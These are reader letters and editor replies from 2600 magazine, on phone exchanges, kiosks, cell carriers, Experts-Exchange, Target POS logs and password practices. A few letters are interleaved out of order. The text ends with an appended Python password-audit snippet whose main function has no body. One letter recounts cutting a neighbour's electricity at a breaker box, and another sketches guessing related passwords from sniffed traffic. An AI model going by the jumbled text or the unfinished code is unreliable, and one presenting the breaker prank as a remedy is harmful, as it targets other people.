That recording has been around forever, well before Verizon even existed. In the New York area, the 9901 suffix is often used to identify the switch type of a particular exchange. It used to be that dialing anything in the 99xx series would hook you up to something being run by the phone company - 9970 would always get you a busy signal, 9971 a fast busy (reorder), 9979 a sweep tone, and 9950 oftentimes would connect you to the business office. These days you could easily wake up a customer in the middle of the night if you try any of these numbers as they're now being used as non-magical extensions.
Dear 2600:
Yesterday I was passing through Venice airport and attempted to use an Internet point. This Internet terminal interested me as it was a free standing kiosk with the option to open files from a pen drive. So I inserted mine so I could open my exploit - I mean photos - from my pen drive. Next thing I was being prompted that I must have my passport snapped by the kiosk's webcam before I can access the machine... something about the Italian government requiring it. Of course I didn't offer it anything and after a few moments the machine prompted for another photo to be taken. So I didn't agree to have my ID photographed and pushed the refund button, but nothing happened. This has to be against some law; there was no indication until I inserted my money that my ID would have to be recorded, and when I didn't agree to these terms, I was not given the option of a refund. The kiosk's owners just made a quick buck from me with absolutely no return. Does anyone know if this is normal practice or does it happen in any other countries? 2600 readers, beware of such terminals.
Pdraig
We doubt such a thing would be tolerated for very long over here, unless people were told it was needed for homeland security or something. And what are the odds of that? But it would be helpful to expose the name of the company running this kiosk and stirring up some outrage about these practices. That's the very definition of civic duty.
Dear 2600:
Just recently I've been interviewing for jobs in my area and noticed a few things. One is that it seems like all senior network engineers like to brag about their networks, which could make for an outstanding social engineering experiment. For example, I interviewed with a university in my area and the guy went really in depth with what they use and/or plan on using. I would think these people would only divulge information that is necessary to gain an understanding of what the applicant skills are. The second thing is that if you are trying to get into an information assurance career, good luck. You won't even get someone to talk to you unless you have taken and passed the CISSP. I don't understand how this makes you any more knowledgeable. I've worked with a few people who have had this cert and all they did was cram for it weeks in advance to pass. After taking it, they dumped all the information that they learned. Maybe you could shed some light on how this cert became so popular.
tim
It's really not much more than the power of suggestion.
Dear 2600:
I'm not sure where to submit my take on the cover submission (24:4) but I hope it gets to the right place.
My take is that the saying is "Abandon Hope all ye who enter here." Which is the inscription above the gates of hell. Basically, the date and the sky and statues above the entrance are saying this to me. Abandon Hope, for this is the end of the Hotel Pennsylvania. And that this is truly the last time we will be getting together here. It's the apocalypse for the hotel. My clues came from the "make reservations to attend" on page 64, and of course Google for the other information.
If I'm wrong or on the right track, please let me know.
CJ Lorenz
We will.
Dear 2600:
I'm writing you concerning my cell phone service with T-Mobile. Over a year and a half ago I noticed that I was able to hear the person calling before hitting the answer button. My phone is always on vibrate, and I can hear the person speaking quite clearly. I've showed this interesting problem to several friends, so I know it isn't in my head.
Six months ago I bought a new phone, and before being able to purchase it, the T-Mobile worker had to mess with my account information on their computer. Needless to say, within minutes of walking out of the store I was experiencing the same problem.
I have since switched back to my old phone, and it no longer happens. I don't have a history of mental illness, nor do I tend to be overly paranoid. Obviously it would be very easy to experience a lot of paranoia in this situation but I've been doing my best to stay grounded and logical.
I've asked several people and even called T-Mobile about this issue. They all have said the same thing: it's not possible. Surely it is or otherwise I wouldn't be writing this letter. I was hoping the 2600 staff or loyal readers might have some words of knowledge for me.
rmpants
This isn't the first time we've heard people swear this has happened to them. We've also heard people say they can hear the called party before they answer. In your case though, we're curious as to what you believe the risk is to you if you can hear people speaking before you answer their call. Also, why exactly are they speaking before you pick up? We think you should use this opportunity to run all sorts of experiments.
Dear 2600:
I was listening a while back to one of your Off The Hook podcasts where you were discussing stopping people's snail-mail by USPS over the Internet with no verification. Thought you might like this.
I live in Ireland and recently I switched my mobile operator. In Ireland all the rage is that you are allowed to keep your old phone number when you switch. So this is what I wanted. The lady asked what my old number was, so I told her. Since I was getting the pay-as-you-go plan, I did not have to provide my real name or anything, and the lady even confirmed this for me when I asked about it. At the end of the process she thanked me, and handed me the new SIM card (which cost nine euros and came preloaded with ten euros worth of credit). I asked if that is all. She replied that it would take up to 24 hours for the phone number to change. (It actually took about four hours.) No verification of any kind that I own this phone number! They even promised to do all the paperwork in three minutes or you get 30 euros worth of credit. Note for North American readers: in Europe some banks offer the ability to verify/approve bank transactions (like purchases with your credit card, wire transfers, etc.) using SMS/texting on your mobile.
SiKing
Dear 2600:
I just received my new sweatshirt. Thanks for the very quick delivery. It had the following effect on my family members:
1) wife - rolled her eyes and made some kind of grunting sound.
2) son, age 12 - "Cool sweatshirt Dad. Did you get me one?"
3) daughter, age 9 - "Is 2600 the price?"
4) daughter, age 7 - "Mom farted."
Bob
At least now we know what the grunting sound
was. Very similar conversations take place in all sorts
of households around the world when 2600 clothing
makes its entrance.
Dear 2600:
As someone who hates getting ripped off, I've disabled text messaging on my AT&T account. Unfortunately, this means I can neither send nor receive text messages, but fortunately it also means I'm not paying extra for something that transmits an infinitesimal amount of data when compared to voice calls.
I found out recently that I can still receive multimedia messages from my friends' phones. A message is sent to my phone via AT&T which directs me to go to a website to view my multimedia message (http://viewmymessage.com). A username and a password is provided in the message to my phone, and I have six days to look at the message before it expires. After entering the username and password, I was taken to a page that displayed the to, from, subject, date, and size of the message, along with my multimedia message (usually an image) embedded in flash.
I'm pissed that they'll offer me six days to view messages sent to me with no option for saving the information! I'm not too experienced with working around embedded flash, but I know it can be done. Another interesting tidbit, regardless of username and password, after entering your info all users are redirected to the following URL: http://www.viewmymessage.com/en/webnonsubscriber/viewmessage.do. There was some interesting info in the page source, but I was unable to use it to find any info on exactly where my image was (nor to find multimedia messages intended for other subscribers). Just thought I'd share this info in hopes that someone out there with the know-how will explore it more thoroughly than this n00b.
Noli
Incidentally, we have a very interesting piece on text messaging in this issue's "Telecom Informer" on page 13.
Dear 2600:
After reading some of your most recent issues, I noticed the white boxes on your new spines (which just look awesome, for the record) and noticed that they seem to be forming letters of some kind after comparing the spines of two recent issues.
It appears that they make some sort of word/phrase when placed together in order, but I can only extrapolate from the 24:4 and 24:2 issues. So, what's the "Secret Word" here? My best guess is "FUBARIFIC" but I know that's not right because I'm more or less guessing on the last three letters.
Jigsaw
We only got as far as four of the eight issues needed to make it complete (not in issue order, either). But two things happened that hastened the project's demise. One was that the new binding sucked and was causing our readers much distress. The other was that some of our smart alecky readers had already figured out the message a full year before it was supposed to be finished. The secret word was "Surprised?" We certainly were.
Dear 2600:
At the end of my article from 25:1 on Wikipedia it states that the AfD on Ebony Anpu was overturned by the "Deletion Review Administration Page." This is incorrect. I could not outmaneuver the Administrator I call Jeffrey who locked the page so that it could never be recreated at all without Administrator support (a strange action, to be sure): http://en.wikipedia.org/w/index.php?title=Ebony_Anpu&action=edit
As per Martin Eberhard's excellent suggestion to make a plug-in called "Haystack" which makes search noise, there is currently a Firefox plug-in called "Track-Me-Not" which I enjoy and acts similarly.
Barrett Brown
Dear 2600:
I still cannot tell whether the expression of disappointment over the newspaper and TV news accounts in your documentary (Freedom Downtime) is genuine or is meant to be ironic. I would have thought that, by the mid 90s, everyone already knew that the "major" outlets were providing entertainment instead of information.
In case you have not run across it already, I will recommend David Simon's stuff from the March 2008 issue of Esquire about his time at the Baltimore Sun. It helps with the perspective. Of course, he presented it as entertainment, too, so keep it in perspective. The URL is http://www.esquire.com/features/essay/david-simon-0308
Other than that, I liked your documentary. I wish it had a better ending.
Peter Di Giovanni
Simon's cynicism about the plight of newspapers and the media at least led him to write and produce "The Wire," a project that finally made the invention of television worthwhile.
Dear 2600:
I used to collect comics and was bored one night and thought "hey, why not read one of those old comic books you have lying around?" So I did. This comic was Ghost Rider 2099 (issue number one, published in 1994), an odd futuristic version of the original comic published (and made into a movie) by Marvel. I was reading through it until the main character "zero" was speaking to one of his cohorts over a video payphone. When he was reporting about the casualties of the fight he had just escaped, he said "Phrack and 2600 are dead. Warewolf too, maybe." A coincidence? I think not. Hopefully the writer of Ghost Rider 2099 (Len Kaminski) wasn't trying to make a statement about Phrack and 2600, but I thought you would like to know anyways.
lo$er
It's amazing the things you can find by reading comics. We just hope Warewolf is OK.
Dear 2600:
First, I would like to compliment you on the change from a glued to a stapled binding. It's easier to fold the mag in half and read from edge to edge.
Second, I look forward to my new issues of 2600 as the articles are all very cool, in particular "Hacker Perspective" and "Telecom Informer." I know some users prefer more tech articles and how-tos but one can always Google, newsgroup, and even read basic stuff like "Hackers for Dummies" and even the whole "Steal this Computer Book..." series.
Lastly, I enjoy the blend of philosophy, politics, and technology that you achieve and wanted you to know that when you raise your prices in the near future as I think you must, I will still subscribe. The mere $6.25 an issue is pennies when compared to the wealth I find in your mag. It's the single most valuable mag that I subscribe to and I have many, Wired being the worst piece of trash, but it's free.
aurfalien
Dear 2600:
I just finished 24:4 and thoroughly enjoyed it. I got to thinking (yes, most people would rather die than think - it's so much like work) and decided to let you folks know the value, enjoyment, and safety I have received from my reading of 2600.
As a physician I had been in private practice and am now semi-retired. I managed our admittedly small, five computers with router, hub, etc., network for the integrative care practice. Knowing that the Windows environment was a major problem and nearly impossible to secure, my consultant and I chose to use SuSE Linux 8.2 (yes, a bit ago) for the principal server, with Samba as the interface since we were required to use WinBlow$ XP Pro as the client OS due to software issues.
Having only Knoppix as my intro to Linux, the first year was a nightmare of a learning curve and 1-2 am as day's end was common. The SuSE admin manual was as frequent an occupant of my desk as both 2600 and Linux Pro. By the second year the admin manual was mostly on the shelf but 2600 remained on the desk.
The move to 9.2 was a bit rocky but went okay overall. The equipment was HP Pavilion 733 series. While that wasn't very remarkable, HP's policy regarding their hard drives was. I didn't think much about it when we set up the server as wholly Linux by the expedient of squishing WinBlow$ into a little bitty 24 GB partition. Yes, it still ran but it was essentially out of my way. I set up my personal machine as a dual boot with Win (24GB)/Linux (65GB). I would have ditched Win entirely but the office management and EMR was Win only now, though originally written for Linux. I still bless Samba and Cups!
Now the oddness. I had an occasion that forced me to call HP for a hardware issue. The Ethernet card mostly died but WinBlow$ saw it as good. I didn't think anything of answering the tech's question about the OS setup and that it was dual boot with Win essentially compacted. I was told that I had voided my warranty and got hung up on.
After several calls and good old Marine Corps stubbornness I spoke with a supervisor that explained that I had voided the hardware warranty by removing the installed OS. Then the fur flew! I finally got a copy of the hardware warranty in writing and sure enough you void it if you remove it. I found this a particularly disturbing tactic by Windows/HP. So after going round and round, I finally convinced them that there was nothing that prevented me from a dual boot setup so long as I did not "remove" the pre-installed OS (XP-Pro). Eventually the whole issue was bumped to a case manager who not only was Linux competent (and not allowed to address Linux issues) but understood that I had not voided the warranty and even set up a remote connection to screenshot and verify it to end the hassles downstream and attempts to void the warranty. As it turned out he was also a 2600 reader though he asked me not to repeat that to other HP folk. It was through a 2600 article that I found a way to test the e-card from the Linux partition and the Knoppix as well determining that the card was indeed bad and it was eventually replaced.
So in closing, it was through my using 2600, Linux Pro, and similar periodicals that I learned things to help me protect and service my network and keep it up and running. Thank you very much 2600 staff and may the PTB never prevent your information from reaching those who need it. I would appreciate it if you would just use Dr. C rather than my full name. I do have a few patients who are computer literate.
Dr. C.
Critique
Dear 2600:
In Forensics Fear (24:4), Anonymous Chi-Town Hacker writes a pretty pointless article filled with obvious errors and making vague references to stir up some random fear. I just wanted to point out a few so that others would see that he's full of #@*%. First, he starts off with claiming there's new software that runs your system and gives a process name (although it can be changed, he claims) and then goes on to say that it runs underneath the OS and is OS-independent. Well, you can't have it both ways. If it's running as process, that means it's running on the OS and, besides, the only thing running underneath the OS is the BIOS. Even the low-level device drivers are OS-dependent and running with the OS not underneath it. You can have OS-independent source code (which only means it's easily portable), but you can't have OS-independent programs (except for things like Java, which still require the OS-dependent virtual machine). Next, he writes this idiotic sentence: "Because the pac is underneath the OS, it has the ability to act on all 10,000 computers at once." WTF? How it runs on one PC has nothing to do with whether it's connected to other PCs or not. Also, if it's running under the OS, it's not going to have access to the ethernet hardware, since the driver for the ethernet card is part of the OS. So, while such software may or may not exist and may or may not be in use, this person doesn't know enough about computers to be able to tell us anything useful about it and is just writing to add to people's fear rather than allay it with knowledge.
Gunslinger
Other than that, you enjoyed it?
Dear 2600:
I find it ironic that on one hand a vast majority of hackers push for the freedom of information and sharing of knowledge while at the same time fight vigorously to point out security holes, plug their own security holes, and fix those of other people's. Not only that, but while making the claim of freedom of knowledge and information, some of these very same people are in charge of securing networks and systems whose sole purpose is to block access to this information (and I am excluding from this those charged with protecting Social Security numbers, phone numbers, etc.).
I guess it can be boiled down to "freedom of information... just not mine."
Chris A.
It would be nice to mention some specific examples because it almost seems as if you're claiming that security holes somehow represent freedom of information.
Dear 2600:
I have been reading 2600 for a couple of years now. This magazine can be as addictive as cocaine. There are a few things to be said about this magazine. In the following list there are more praises than anything else.
The best things about this magazine are:
1. Staff letter comments usually have a neutral and fair way of expression. They aren't close-minded. Many times they challenge readers to think beyond their normal thought.
2. Letters seem perfectley uneditted (those typos were included to prove my point).
3. Witty or smart remarks on letter comments are pretty much always justified (see page 38, Issue 25:1, letter by "granny").
4. Criticisms and praises of magazine format and subject have seemingly always been addressed. (Addressing these issues is smart since you would want to keep readers.)
5. You print readers' letters that would almost be a waste of valuable zine article real estate. This seems to add diversity to the magazine. (Sorry, but some letters really are a waste of lines... perhaps this one would be if printed.)
Here comes the "dislike" portion of my letter:
1. Sparingly, some of the articles are boring. I detest reading some perspective of a non-interesting topic.
2. Some articles, not just reader supplied articles, are a bit too political or they kind of make me think the author has trust issues (paranoid, if ya know what I mean).
Ultimately, not all the articles printed can satisfy everyone. I appreciate the fact that you print a diversity of articles and letters, even if they are boring or kinda stupid (sorry, again), because this shows your support of the freedom to share ideas and the freedom to speak your mind. Also, I will concede that sometimes being too relaxed with our information or even our freedom, can be dangerous and a little paranoia can be safer.
Next matter, Issue 25:1, the fictional story "To Kill an Atomic Subwoofer" was an interesting story. Not because it was good, but because (since I don't read the TOC first and didn't see "story" preceding the name) it was a mean trick to me. I took reading it seriously at first, though I suspiciously read it as a story rather than article. After reading about a third of the article (maybe less), I realized that it was all crap. I may not know too much about radio waves but when someone says something like "I may not know too much about radio waves" it is usually a sign that they don't know what they are talking about (please do not relate that last comment to the whole of this letter). I felt pretty deceived, as well as the rest of us "table-of-content-reading-challenged" people. Even though I have a couple of dislikes about this magazine, the likes very much outweigh the dislikes.
I live in Chicago, so I could imagine what it would be like for them to tear down a piece of history from our great city. To end my article, I leave a question. Do you really intend to stop HOPE after seven conventions if they decided to tear down that New York historical masterpiece? (Thanks for making a great magazine and sorry to hear about the pending fate of the Statler Hilton.)
Shocked998
We do in fact edit letters. If we didn't you would have great trouble reading a lot of what is sent to us. Plus, spelling and punctuation errors are no fun for anyone. With a few special exceptions which come along every now and then.
And again, specifics are always nice when saying, for example, that a viewpoint is paranoid. It gives us the opportunity to counter the point, assess our own beliefs, and mark you down as part of the conspiracy.
Oddly enough, the sarcastic reply you mention in item #3 has apparently been taken as gospel by some people, as our first letter writer attests.
As for the fate of the hotel, we have one last hope. And we hope you're a part of it.
Dear 2600:
In Issue 25:1 I can't help but notice the similarity between the article "Password Memorization Mnemonic" and my own paper, "Mnemonic Password Formulas," which was published last year in Uninformed Journal Vol. 7 (May, 2007, http://www.uninformed.org/?v7). The article was at best simply an under-researched article as there are other mnemonic techniques that are much more effective than the template (formula) technique described, and at worst a watered down plagiarism of my paper, even retaining the overall subject matter layout, sans overview of previously established and documented techniques. The technique presented in the article is essentially a simplified version of the technique described in my paper, however I'll give the author the benefit of the doubt and assume (s)he didn't read up on the subject as there were zero references or citations included with the article. For readers curious about the subject of complex password creation and recall, I advise reading through the prior art cited by my paper and finding a technique that is comfortable for the reader.
Druid
Dear 2600:
Stop your inresponsible word! Tibet is, was and always a part of China, that no doubt of it, please stop your ignorant words if you know nothing of China. China is a beautiful, great country, welcome to China to see every thing with your own eyes and get your own conclusion. We can't tolerance someone split our country, we can fight to the death!
indiana_lau
How about you go and fight to the death and we
can try and figure out just what in hell you're going
on about and why you think it has anything at all to
do with us.
Dear 2600:
I'm just dropping you a quick note from the UK to tell you how impressed I was with your Spring 2008 issue. I've been reading 2600 since 1993, and I can honestly say that this is your best issue yet. If I had to show someone just one issue of 2600 to illustrate what it's all about, this would be the one. You've managed to cover the whole scope of the hacking world, from beginner's tutorials like "Uses for Knoppix" through to the advanced "Eavesdropping with LD_PRELOAD" (which I barely understand, but still enjoyed reading). You've covered everything from the legal issues, through the usual scams and pranks, to exploration of new technologies, with not a dull article amongst them. You've got the dry technical articles mixed with some more personal explorations (like "A Closer Look at Wikipedia" by Barrett Brown and "To Kill a Subwoofer" by Dionysus - more like these please. Even if the latter was total BS, these are engaging and inspirational reads.) The regular columns like "Telecom Informer" and "Hacker Perspective" form a great continuity between issues. And I definitely appreciate the ordering of the first set of articles, drawing a line from one VoIP article to another, and between the Barcode and RFID articles. Although the quality of everything is very high, I would especially like to single out for praise Phlux's article on gang signs. It's well written, left field from your usual contributions, sure, but still fits perfectly with the hacker mentality of exploration and creativity. Oh, and cheers for going back to the stapled spine, it all just feels much more solid to me.
On another note, I'd just like to say in regards to the discussion around whether 2600 is getting "too political," that anyone who thinks that the hacking world is divorced from the political is living with a cardboard box over their head. Sure, in an ideal world there's "exploring technology" on the one side, and politics (all that stuff about war, taxes, immigration etc.) on the other. But in the real world, in this day and age, when "exploring technology" is outlawed by the state in so many ways (and increasingly so), and when our personal freedoms are being eroded using the same technologies we want to explore, well, the politics comes to us. The hacker mindset has never been about simply dismantling a radio in an isolated lab somewhere - it's always been about the social context that our technologies are used in. And when that social context changes - becomes "political" - so "hacking" changes too. Like it or not, hackers, and magazines like 2600 which represent us, are on the front line right now, because it takes a hacker mindset to first see what's going on with some of these issues. It'll be hackers that uncover root kits in Sony DRMed CDs, it'll be hackers that discover how much surveillance we're under from our respective governments, it'll be hackers that reveal to the world the abuse of our personal data by corporations and government agencies around the world. And this is a good thing - this is the way it's meant to be.
iivix
Projects
Dear 2600:
I'm a student at Columbia's graduate school of journalism and I'm putting together a letter to the editor mash-up for the New York Review of Magazines (see last year's edition at http://www.nyrm.org/), taking different sentences from different unpublished letters and Frankensteining them into a cohesive whole.
The goal is to form the type of letter one would really want to see: Funny, crazy, but curiously on point. In other words, Readers: Here's what a letter to the editor should look like.
Some of the letters I've seen in 2600 are fantastic (I'm thinking in particular of the cease-and-desist from General Motors), and if you contribute a letter or two - or six, that would help us take this short piece to a higher plateau.
In the editing, I'll footnote each sentence to show where letters came from, but leave the writer anonymous.
So please contribute! You can reach me by phone or e-mail if you have questions. The deadline for the rough draft is Tuesday, March 4th.
dave
Sounds like a great idea and we're certainly open
to this sort of thing. But we have all we can do to
go through the piles of letters that come in and select
which ones to print without also responding
to a whole other pile of project ideas like this one.
We didn't even see your letter until well past your
deadline, not that we likely would have had time to
respond if we had seen it before. So for the future, by
all means, do something artistic with our stuff. Just
give credit and let us see what you come up with.
Dear 2600:
I am writing you this letter to ask for your help!
I have disrespectful neighbors and their visitors.
They blast their stereos at all hours of the night. Is
there a circuit I can build or buy to disrupt or turn
off the stereo?
David
If the fictitious solution we printed last issue
doesn't help you, perhaps the following real world
account will.
Dear 2600:
I read your "To Kill an Atomic Subwoofer" article
and was disappointed at the end to see the note that
it was fiction.
However, it brought to mind something that actually
happened to me. This was a long time ago in a
galaxy far far away as the saying goes.
No lie, I was studying to be an electronics technician
in Kansas City. The old apartment building I was
living in was a bit run down and had all manner of
tenants.
One day I was trying to sleep in preparation for
an important test the next day and the apartment below
had the stereo going full blast, preventing any
thought of sleep.
As I lay in my bed contemplating my options, I
thought of knocking on the door and asking nicely,
but given the nature of some of the tenants I scratched
that (I did want to live to take the test the next day).
My mind drifted to something I had seen in the
basement next to the storage bins: a breaker box.
I crept down the stairs and entered the basement.
Looming in the dark was that breaker box. I opened
the unsecured cover and lo and behold each breaker
switch was labeled with the apartment number. A
flick of the switch and my path to sleep and an A on
the test the next day was "in the bag."
The next morning as I was leaving I saw that a
KCP&L truck had shown up and was puzzling over
the situation. "Damn, must have been them there
powerful speakers in your stereo."
Breaker Boy
Dear 2600:
I have been a longtime reader of your excellent
magazine but this is my first submission and would
love to see it published. I've had to use my real name
on the return address which I trust will be withheld.
freedom of information to the hacker subculture. Any
input, content suggestions, stories, or articles can be
submitted to Systemfailure, S. 200 Spruce Ct., Postfalls,
ID 83854.
Inmate #210266
Responses
Dear 2600:
This is a response to Jesse's letter on time travel
in 24:4. It is good to see you're thinking and trying to
unravel the universe but I am going to have to break
your cosmic bubble. Let me start by saying yes, many
scientists do believe that time travel is possible (I do).
However, you seem to misunderstand a few of the
concepts. Time does not necessarily move in only the
forward direction; Stephen Hawking has defined the
concept of time's arrow pointing one way but this is
not proven and has in fact been disproven by many
physicists (read some Brian Greene). Now on to your
time machine: "wrong oh, Buckaroo Bonzi." Your
basic concept is sound, research "the twin paradox,"
but the problem is in the energy and speed required.
In order for this to work, for more than a few milliseconds
of time gain, you would have to travel very
very close to the speed of light. The problem with
that is, as Einstein described, as you approach the
speed of light, mass increases. If this is the case as
the mass of your ship increases, the force required
to push it has to increase. At the speed of light mass
is infinite, so it would take all the force in the universe
to move the ship. So, at speeds near the speed
of light you would need nearly all the force in the
universe to move it. A more sound way of achieving
time travel, in both directions, is to literally tear the
universe a new space hole. In the interest of brevity I
will keep this short and sweet. If you could isolate a
micro-singularity, which appear and instantly disappear
around us all the time, and then inject into it a
nice chunk of antigravity (the opposite of a gravity
particle), you would create a worm hole in space-time
joining two previously unjoined points. One end
of this worm hole could then be spun near the speed
of light (negligible mass), for, say ten years, while the
other end is kept fixed. The result of this would be
a time machine. You would have a worm hole that
connects two points in space, where one end exists
ten years in the (relative) future while the other is
ten years in the (relative) past. You could then pass
anything through this and move it either ten years
into the future or ten years into the past. Paradoxes
abound ("grandfather," "conservation of mass/energy,"
etc.) but all of these have been addressed and
the theory still proves to be sound.
My credentials: Degrees in chemistry and mathematics
and my hobby, besides the occasional hack,
is particle physics.
Also, I recommend you do read Brian Greene for
more information, but read with caution. His background
information is very clear and accurate but he
jumps to some non-sequitur conclusions.
Emperor
We would really like this issue to be resolved one
way or another as soon as possible. Is that too much
to ask?
Dear 2600:
I am currently compiling articles and short stories
for a website that is to be launched upon my release
from incarceration at the end of July. We hope the
security minded site will prove to be a place for like
minded individuals like your readers (including me)
to submit articles regarding anything from information
systems security - or lack of - and the pursuit of
First and foremost I would like to say keep up
the great work. I love your mag and have been reading
for close to a decade, though I miss the page 33
differences that used to appear in older issues. In issue
24:4 Jesse put forth a theory about time travel. It
has one problem summed up in two words: Stephen
Hawking. He decided to write a book called A Brief
History Of Time back in 1998. Not that I am trying to
cast doubt upon the originality of Jesse's thought, but
it is as though his/her theory was pulled directly from
the pages of Mr. Hawking's book.
Omega_Iteration
Dear 2600:
I was reading the article in the Winter 2007's
2600 issue about decrypting the ROT-13 on Experts
Exchange, and the article ended by saying they don't
use ROT-13 anymore; they're actually "protecting"
it now.
Well, okay, but they're not protecting it. This was
true back when they were doing the ROT-13, but...
c'mon, guys; all you had to do was scroll down.
Example at http://www.experts-exchange.com/Web_Development/Web_Languages-Standards/PHP/Q_22107984.html
Zach C.
Dear 2600:
I'm writing this in response to the article "Decoding
Experts-Exchange.com" written by Phatbot.
I also used to get frustrated when searching for
information on solutions would return results that
seemed to be dead on, but hosted at expert-exchange.
Until I noticed that the Google results were
listing text from the potential solution. You and I both
know that Google only indexes what it sees when it
visits the site. So one day, I loaded the cached page
instead and used the find in my browser to locate the
keywords that Google returned for my results. Guess
what, Experts-exchange has been fooling us all! I
realized that if I paged down several pages, the actual
solution is there in plain text. Recently, I noticed
they have added a lot more pages of garbage before
showing the plain text, but it is still there.
What I really hate are the search engine snipe
sites that pick up on the terms you are searching for
and return what looks like a solution when all you
find at the site is search results for their brain dead
search engine or worse yet a drive by downloader.
Hope this helps tame your frustration.
Exo
Dear 2600:
In response to the "Hacker Perspective" article
in this newest issue, I wrote a program that will perform
searches at multiple search engines of random
search terms at an interval specified by the user. Do
you have any ideas on how I can get this out to the
people? It is of course open source.
Rob
One really swell way would be to send us the
program or give us a link or something - anything.
Dear 2600:
Possibly Variable Rush's article on Knoppix (25:1)
has triggered a rash of responses like this. As VR discovered,
the use of Knoppix to recover a Windows
system is limited by the fact that Knoppix does not
have a license to write to NTFS formatted disks. A
much better recovery tool is "Live Windows." This
can be found at www.ubcd4win.com and imaged
onto a CD. Once booted from the CD, it is able to
write to NTFS disks and contains a suite of tools that
allows you to do considerable emergency surgery on
a failed system, including changing both account and
CMOS passwords, although tampering with CMOS
with software not originating from the CMOS manufacturer
may not be a good idea in every case. A failure
to write to the CMOS correctly could scramble
the CMOS enough to require replacing the motherboard,
so I have not tried this particular utility.
Using a Live Windows CD, I have been able to
successfully recover several Windows systems that
have crashed or been locked out for various reasons
and get them back on the road. The only snag is that
like any "live" CD, it is limited by the computer's ability
to boot from a CD. If the BIOS does not allow this
you are stuffed... unless anyone knows different?
Peet the geek
Dear 2600:
I am writing this letter in response to "Transmissions"
in 25:1. The article suggests that the reason
Time Warner is playing with this idea is a totally malicious
one that is aimed at holding back its customers
just to increase its monetary income. While, yes,
the reason for playing around with this idea definitely
has to do with money, it is not meant to be malicious
or controlling.
As an employee of the company, I heard about
this quite some time ago (about six months ago to be
exact). One of the main reasons that they are actually
toying with this idea to limit bandwidth is because
when they looked at their traffic statistics for
2006, they saw that over 90 percent of their available
nationwide bandwidth was being used for peer-to-peer
sharing, which only accounted for roughly
ten percent of their subscriber base. Put plainly, ten
percent of our customers use over 90 percent of
the nationwide bandwidth while 90 percent of our
customers use less than ten percent of the available
bandwidth.
Notice that I said "available bandwidth," not
"bandwidth used." Basically, Time Warner is running
out of bandwidth. And instead of increasing
their bandwidth (as that would cost money), they are
thinking of implementing this pay by usage idea.
This is of course absurd and I do not agree with
it in the slightest, but I just thought that maybe you
should know a little more of what is going on behind
the scenes.
Unr3al
Dear 2600:
First, I would like to thank you for your response
to F33dyOO's letter in 24:4 on the topic of Target's
in store network security. I was glad to see that you
guys recognize that people with technical capabilities
sometimes have to occupy mundane jobs to pay
the bills. I was one of those people myself for the
better part of a decade.
Moving on, though, I would like to confirm the
information presented in the original article (24:3
"Target: For Credit Card Fraud"). I left Target for a
programming job about three years ago, but in my
time occupying various positions at three different
Target stores, I recognized the same flawed setup at
each store. The POS systems (at the time) were nothing
more than Windows NT machines that had POS
software running on them. Those machines transmitted
transaction info to the store's server as the
transactions were processed. This info was typically
stored for up to a month in case there was any need
to recall it and even though the credit card number
is obscured on the receipt, it is not obscured in any
way once you have access to view it in the store's
transaction log.
That's just my $.02 on the topic. Thanks for putting
out a great mag.
Ed
Dear 2600:
In response to Agent ZerO's article "Password
Memorization Mnemonic," I think the methods described
aren't much better than using the same password
for every account.
Let's say I'm sniffing traffic at a coffee shop and
see you login to MySpace with the email agentzrO@gmail.com
and the password myspaceFz2!mROO.
You can bet my first password guess on your gmail
account will be gmailFz2!mROO. Hell, I might as
well try paypalFz2!mROO and wachoviaz2!mROO.
The danger of mnemonics for passwords is that if it's
easy for you, it's easy for an attacker too. Here, in my
opinion, is a better way of doing password security.
Use a different completely random password for
each account. I like using the program pwgen to generate
random passwords. There are several websites
that can do this for you as well. Keep all these passwords
in a text file on your computer. The passwords
you use most often you'll end up remembering, the
rest you'll have to look up in this file.
But don't leave it in just any text file on any computer.
Use whole-disk encryption. Debian, Ubuntu
(alternate CD), Fedora Core, and probably more Linux
distributions come with whole-disk encryption
built into the installer. If you use Windows, PGP
Desktop is a good choice.
Use PGP as well (or gpg, if you're the Free Software
type). Everyone should be using this for everyday
email encryption, but it's also very useful
for encrypting files on your hard drive. Keep your
password file encrypted with your PGP key. When
you delete your temporarily unencrypted password
file, use a program like wipe or shred so it can never
be recovered if your computer ever got stolen and
the thieves ever managed to break your whole-disk
encryption.
This might sound like a very complicated and
paranoid way of doing things, but it really isn't too
bad for your everyday computer nerd, assuming you
regularly use PGP. And these are things that it's good
to get in the habit of doing anyway.
mOuntainrebel
too much information about ourselves for no good
reason. Everyone has something they want to keep
to themselves and until that's seen as a good thing
worthy of being encouraged, we're going to have a
tough time getting non-technical people to take these
basic precautions.
Dear 2600:
This is in response to Agent ZerO's Spring 2008
article "Password Memorization Mnemonic." While
his technique is very simple and easy to use, it does
create a great deal of risk. If a password is compromised
at one site, then the attacker can make
a strongly educated guess at the user's other passwords;
if buy.com uses buy123, then Amazon probably
uses amazon123. This means that the most
important passwords - eCommerce, online banking
- are only as safe as the weakest site the user frequents.
And since many coders out there still store
unencrypted passwords in the database, this is a very
risky proposition.
Instead of using an easy-to-predict pattern, consider
using distinct complex passwords, but storing
them securely. If you're on the Windows platform,
Bruce Schneier's free PasswordSafe is easy to use
(and written by an authority on cryptology). Both OS
X and GNU/Linux make it easy to set up encrypted
partitions and/or disk images that can be used to
store passwords.
Also, remember to change passwords frequently.
Once you're in the habit of tracking a large set
of passwords, you might be surprised how quickly
your fingers will remember them, even if your brain
doesn't.
creepyinternetstalkerdude
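
The risk both password letters above describe, as an added example (not from the letters or the magazine): a Python audit that strips the account name out of each stored password, flags accounts left sharing the same secret, and replaces them with independent random passwords. The vault contents, the alphabet and all function names are assumptions made for illustration.

```python
"""Audit a password list for site-derived patterns and issue independent replacements."""
import math
import secrets
import string
from collections import defaultdict

# Assumed character set for generated passwords (75 symbols).
ALPHABET = string.ascii_letters + string.digits + "!#$%&*+-=?@^_"


def generate_password(length=20):
    """Return a password whose characters are drawn independently from the OS CSPRNG."""
    if length < 12:
        raise ValueError("use at least 12 characters")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def entropy_bits(length, alphabet_size=len(ALPHABET)):
    """Bits of entropy of a uniformly random password of this length."""
    return length * math.log2(alphabet_size)


def residue(label, password):
    """Strip the account label out of the password (case-insensitive).

    What is left is the part the user actually keeps secret. If the label
    does not occur, the whole password is the residue.
    """
    pos = password.lower().find(label.lower())
    if pos < 0:
        return password
    return password[:pos] + password[pos + len(label):]


def audit(vault):
    """Return {residue: [labels]} for every residue shared by two or more accounts.

    This catches both verbatim reuse and "label + fixed suffix" mnemonics:
    one leaked entry gives away every other entry in its group.
    """
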